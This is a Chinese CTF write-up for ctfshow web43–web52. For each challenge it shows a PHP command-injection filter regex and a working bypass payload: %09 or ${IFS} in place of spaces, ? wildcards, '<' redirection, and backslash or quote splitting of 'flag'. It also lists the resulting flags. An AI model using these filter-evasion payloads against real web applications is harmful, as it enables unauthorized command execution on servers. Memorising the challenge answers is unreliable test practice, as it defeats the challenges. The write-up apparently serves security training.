目录

1、web43

2、web44

3、web45

4、web46

5、web47

6、web48

7、web49

8、web50

9、web51

10、web52

---

1、web43

在上一题 ‘黑洞’ 的基础上新增过滤：

preg_match("/\;|cat/i", $c)

 问题不大，我们不用分号和 cat 就行：

?c=ls||

payload： 

?c=tac flag.php||

拿到 flag：ctfshow{1327bbac-5c2b-44bc-ae8b-35790b8af546}

当然还有很多其他的文件查看命令都可以用，比如：more、less、nl 等

2、web44

preg_match("/;|cat|flag/i", $c)

新增过滤 flag，构造 payload：

?c=tac f*||

拿到 flag：ctfshow{61221e00-a6ab-44be-9f0f-01034265132b}

3、web45

新增过滤空格，使用 %09 代替 

preg_match("/\;|cat|flag| /i", $c)

构造 payload：

?c=tac%09f*||

拿到 flag：ctfshow{2e3d1abb-d4b6-41db-8078-5f557658403d}

使用 ${IFS} 代替也是可以的，payload：

?c=tac${IFS}f*||

说明：IFS 是 linux 的特殊变量，默认值是 space 空格，$ 是取变量值，$IFS 就代表空格。

使用 $IFS$9 也可以，构造 payload：

?c=tac$IFS$9f*||

4、web46

preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)

新增过滤数字、$、*，不使用这些即可，通配符使用问号?，空格使用 %09 代替。

构造 payload：

?c=tac%09fla?.php||

拿到 flag：ctfshow{545047aa-54aa-48ed-9a41-104cebfae6be}

这里特别说明下，为什么 %09 没有被正则匹配检测到？09 不是数字吗？

注意：我们传入的 c=%09 是 URL 编码，在 URL 编码中，%09 表示 ASCII 编码中的水平制表符（Tab 键），而不是数字 '0' 和 '9'。当服务器接收到请求时，它会对 URL 编码的参数进行解码，因此 c=%09 解析后会变成 c=\t，其中 \t 是水平制表符。

也就是说我们的正则匹配在 URL 解码之后才进行，所以不会被检测到。

此外还有很多其他的方法：

当我们换成 < 时发现问号进行通配不行，< 通常用于将一个命令的输出作为另一个命令的输入。

使用反斜杠转义绕过或者使用引号对绕过，payload：

将文件 flag.php 的内容作为 tac 命令的输入，并反向显示文件内容。 

?c=tac<fla\g.php||

或者

?c=tac<fla''g.php||

或者

?c=tac<fla""g.php||

使用 <> 代替空格也是可以的，payload：

?c=tac<>fla\g.php||

5、web47

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)

新增过滤一些命令：more|less|head|sort|tail

用 tac 或者 nl 即可，直接拿上一题的 payload打：

?c=tac<fla\g.php||

拿到 flag：ctfshow{f0f59065-df11-4cec-b502-fc9a7e2c48c8}

6、web48

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)

还是继续在新增过滤的命令和反引号`，依旧用上一题的 payload 就可以：

?c=tac<fla\g.php||

拿到 flag：ctfshow{27fb4c37-7767-412f-9389-0d90b5a9a361}

关于上面那些命令的介绍：

more：用于逐页显示文本文件内容。按空格键显示下一页，按 Enter 键显示下一行。

less：类似于 more，但提供了更多的功能，如向前翻页、向后翻页等。它更灵活且对大文件支持更好。

head：显示文件的开头部分，默认情况下显示文件的前 10 行。可以使用 -n 选项指定显示的行数。

sort：对文本文件进行排序，默认按字典顺序排序。可以使用不同的选项指定按照数字、日期等方式排序。

tail：显示文件的末尾部分，默认情况下显示文件的最后 10 行。可以使用 -n 选项指定显示的行数。

sed：流编辑器，用于对文本进行流式处理。可以进行文本替换、删除、插入等操作。

cut：用于从文本文件中剪切列。可以根据指定的分隔符将每行文本分割成多个字段，并选择特定的字段输出。

awk：功能强大的文本处理工具，可以对文本文件进行逐行处理，支持自定义处理逻辑、条件语句等。

strings：从二进制文件中提取可打印的字符串。常用于查看可执行文件或库文件中的文本信息。

od：以不同的格式显示文件的内容。可以将文件内容以八进制、十六进制等形式显示。

curl：用于在命令行中传输数据，支持多种协议，如 HTTP、HTTPS、FTP 等。常用于下载文件或与 Web 服务进行交互。

7、web49

新增过滤百分号 %，不用 %09，还是用上一题的 payload：

?c=tac<fla\g.php||

拿到 flag：ctfshow{288fc102-97b2-4eec-b76e-2bfdd30f318f}

8、web50

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)

新增过滤水平制表符（tab 键）和 &，其中 \x 是一个转义序列，表示后面跟着的两位十六进制数代表一个字符。

还是可以继续用上一题的 payload：

?c=tac<fla\g.php||

拿到 flag：ctfshow{61d94bfa-55cc-4e6f-b99d-b300934322c8}

9、web51

preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)

新增过滤 tac 命令，使用 nl 绕过，构造 payload：

?c=nl<fla\g.php||

拿到 flag：ctfshow{076f8f1c-e0ad-41e5-b2e6-50fe0a655fa8}

10、web52

preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)

新增过滤大于、小于符号，但是美元符放出来了，构造 payload：

?c=nl${IFS}fla\g.php||

得到 $flag="flag_here"; 

flag 不在当前目录，看一下根目录：

?c=ls${IFS}/||

读取 flag：

?c=nl${IFS}/fl\ag||

拿到 flag：ctfshow{f043c560-aaea-4e22-9072-e6a5eb08d059}